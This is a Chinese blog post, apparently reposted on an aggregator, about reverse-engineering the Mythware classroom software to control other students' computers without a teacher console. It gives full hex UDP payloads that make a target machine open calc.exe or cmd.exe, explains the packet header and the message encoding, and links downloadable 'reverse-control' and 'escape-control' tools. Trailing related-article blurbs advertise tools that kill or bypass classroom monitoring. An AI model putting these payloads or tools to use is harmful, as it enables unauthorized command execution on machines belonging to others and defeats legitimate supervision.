无需教师端极域电子教室的反控制实现

这篇具有很好参考价值的文章主要介绍了无需教师端极域电子教室的反控制实现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

大概是去年,有看到CSDN上面几位大佬提到过,抓数据包来用极域去反控制其他机房的学生电脑,但是写的其实还是不是太详细,有代码,我当时也没看懂,最近无聊就重新实操了一下,在这过程还发现了不少坑。

文章末尾奉上脱控与反控

首先老样子介绍一下软件:软件是极域电子教室V6.0 2016豪华版,具体版本号我没去看,现在学校机房大多数用的都是这个版本。

首先打开Wireshark来抓包看看:
无需教师端极域电子教室的反控制实现

不难发现,教师端的机器一直在朝224.50.50.42这个地址发送数据包,其中含义我们也不清楚,后来在网上找到了一篇网站是介绍这个极域电子教室工作流程的

无需教师端极域电子教室的反控制实现
接着我们来给学生机器执行一条远程命令试试,然后停止抓包

无需教师端极域电子教室的反控制实现

因为我们是针对一个机器来执行命令的,所以找到目标机器的IP地址:192.168.3.2,可以在Wireshark下面看到请求的执行文件名,前面还有一堆含义未知的数据,另外:数据包的长度建议只多不少,不然消息无法发送出去
无需教师端极域电子教室的反控制实现无需教师端极域电子教室的反控制实现
我们去把十六进制数据复制下来,得到这些数据:
444d4f43000001006e03000053ca6c1aee108e419f4972f36d109c69204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c00430041004c0043002e0045005800450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
数据包很长,但是无用的数据也很多,上面是打开计算器的数据包,接下来再抓一下打开CMD的数据包:444d4f43000001006e030000a53fbfe91d62404cb156c44f90b18441204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
两段数据包有点相似,经过多次抓包实验发现,得出一个结论,前面的:
444d4f43000001009e030000dc79fabb169ec04ca009db380f7f34ee204e0000c0a803fe9103000091030000000800000000000005000000
这一段很有可能就是固定不变的值,起码DMOC这段十六进制是不变的,后期发现,相同数据包在一分钟之内只能发送一次,后面我没有去改代码,应该是dmoc后面随机几个字符,就可以实现了,有大佬有能力可以试试,这些都是猜测,如果说的不对也不要怪我哈

到这里还没有完,因为还有一个发送消息的数据包,我们发一条消息给目标计算机:无需教师端极域电子教室的反控制实现
发送过去之后,我们来查看数据包:无需教师端极域电子教室的反控制实现
可以看到,前面一堆数据之后,出现了我们发送的信息(604F7D59),这边就踩了不少坑,之前以为是十六进制,想着转成十六进制带进去就行了,结果发出来是乱码的,于是把汉字用各种编码试了一便,最后发现,
是Unicode编码打乱顺序以后再发送的,解码是学生端那边的事情:无需教师端极域电子教室的反控制实现
可以看到“你好”这两个汉字转出来的Unicode编码是:\u4f60\u597d
处理一下就是:4f60597d,仔细观察,是把这一段分成了两部分,四个为一组,把最后两个和第一二个位置调换,如果我们直接按照转换的4f60597d发送,客户端接收到的就是乱码,我们把乱码拿到Unicode这里重新转换一次,就是我们Wireshark里面的排序方式,说的有点乱,具体是什么样子我也记不清了,可以自己试试

既然知道了排序方法,就来处理一下,但是我只处理了中文,对英文数字没做处理
处理一下:
无需教师端极域电子教室的反控制实现
最后我们把这些得到的数据组合起来,用UDP方法发送出去就可以了(所有的命令一分钟内貌似只能执行一次,需要多次执行可能要随机UDP包数据的开头部分,这个我没做,大佬可以试试看)

脱控如下:

反控效果如下:无需教师端极域电子教室的反控制实现虽然写着无需教师端,但是教师端是要在线且要发送消息的IP连上教师机才可以

反控:https://mangguozy.lanzouj.com/iYCVB025lp1a
脱控:https://mangguozy.lanzouj.com/iBsGA025lopi文章来源地址https://www.toymoban.com/news/detail-447664.html

到了这里,关于无需教师端极域电子教室的反控制实现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 掌阅电子书全系列安装第三方app教程(无需破解)

    本方法采用搭建应用商店的方法来在掌阅墨水屏电子书上安装第三方app,我使用的light2pro已经成功。 需要的软件:github:点击下载 平台:Windows电脑,电子书和电脑连接同一局域网。 下载上面的压缩包后解压,本文解压在E:iRapp目录下。 按win+r键打开运行窗口输入cmd   在c

    2024年02月13日
    浏览(335)
  • 极域工具包 1.0正式发布!一键杀极域!完美破解学生机房管理助手

    原理都在这https://blog.csdn.net/weixin_42112038/article/details/125346545 话不多说,上截图! 这个电脑没有装极域,所以没有把密码破解出来,但是亲测2010版以上可破解 支持关闭6.8-7.2版本的学生机房管理助手,快捷键 Shift + K 。 支持不依赖 taskkill 、 ntsd 等工具杀掉极域。 学生机房管理

    2024年02月04日
    浏览(39)
  • 极域工具包 1.1正式发布!窗口化极域,解键盘锁,适配学生机房管理助手7.4-7.5!

    原理:https://blog.csdn.net/weixin_42112038/article/details/125346545 截图: 支持杀掉学生机房管理助手7.4/7.5 窗口化/全屏化极域广播 挂起(冻结)/恢复极域 极域未运行时可启动极域,降权到登录用户(路径来自注册表) 显示极域存活状态:未运行/正常运行/已挂起 + PID 增加鼠标右上角

    2024年02月05日
    浏览(60)
  • 再见极域(Python水水水)

     我初中时用Python编的再见极域,很多功能没有实现,但基本的杀、冻结还是很好用的。 也不懂太多什么版不版权的,反正都是我自己写的 (现在两年后回过来看,当年写得好丑。。。) 尊重极域,仅作学习用,禁止用来做些有害的事情。还是建议好好上你的信息课

    2024年02月11日
    浏览(32)
  • 反控极域v1.0正式发布(开源)

    exe链接 GitHub - 反控极域v1.0 看完这篇的可以去看第二篇啦,这个1.0版本较旧没有2.0好用,发布在我个人主页里 本软件由 dh高中的无聊同学(划掉) 研发, 机房使用 极域课堂管理系统软件V6.0 2016 豪华版 软件功能: 1.给你的同学执行命令 2.给你的同学发送消息 3.看可爱的甘雨(

    2024年02月11日
    浏览(47)
  • 【1.1,已适配机房助手7.5】更新中!淦翻极域、机房助手的超强软件,附代码思路

    本文内容仅供学习,不得用于商业用途,使用本工具造成的任何后果与本软件及其作者无关! 本软件最新版是1.2。传送门 源码也在内! 下载:https://wwt.lanzoub.com/b00pu06li 密码:bbzl GitHub:https://github.com/BengbuGuards/MythwareToolkit/ GitHub上的版本库持续更新中,欢迎星标以追踪更新!

    2024年02月06日
    浏览(40)
  • 【干货最多】逆向分析学生机房管理助手7.8随机进程名算法、极域U盘、网络、键盘限制

    先给个开幕雷击吧: 这真不知道怎么评价好呢,学生机房管理助手上一个版本还是7.5,在11月23号这天直接跳到了7.8,咱也不知道它是有中间昙花一现的两个版本呢,还是避讳什么,必须跳版本。 说实话,在我满怀期待反编译它之后,一股酸劲涌满我全身:作者开摆了。为什

    2024年02月02日
    浏览(22)
  • 识别flink的反压源头

    flink中最常见的问题就是反压,这种情况下我们要正确的识别导致反压的真正的源头,本文就简单看下如何正确识别反压的源头 首先我们必须意识到现实中轻微的反压是没有必要去优化的,因为这种情况下是由于偶尔的流量峰值,TaskManager的GC,定时任务,或者网络波动正好触

    2024年02月06日
    浏览(25)
  • 绕过EAC 简单的反作弊

    Easy Anti Cheat可能是最流行的内核反作弊,它被用在许多游戏中,它比Battleye更好,因此更难绕过。如果你想绕过它,你还必须有一个内核驱动程序。如果游戏有简单的反作弊,您将无法注入,请附加调试器,包括作弊引擎或对游戏过程执行任何其他操作,直到您绕过EAC。 在继

    2024年02月04日
    浏览(35)
  • 微信小程序的反编译

    参考: 微信小程序的反编译_magic number is not correct!-CSDN博客 如何从在安卓Android手机获取微信小程序源代码 - 知乎 (zhihu.com) 资源: wechar.apk RE管理器.apk Node.js”安装包 反编译GIT: hs610/wxappUnpacker (github.com)

    2024年04月16日
    浏览(27)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包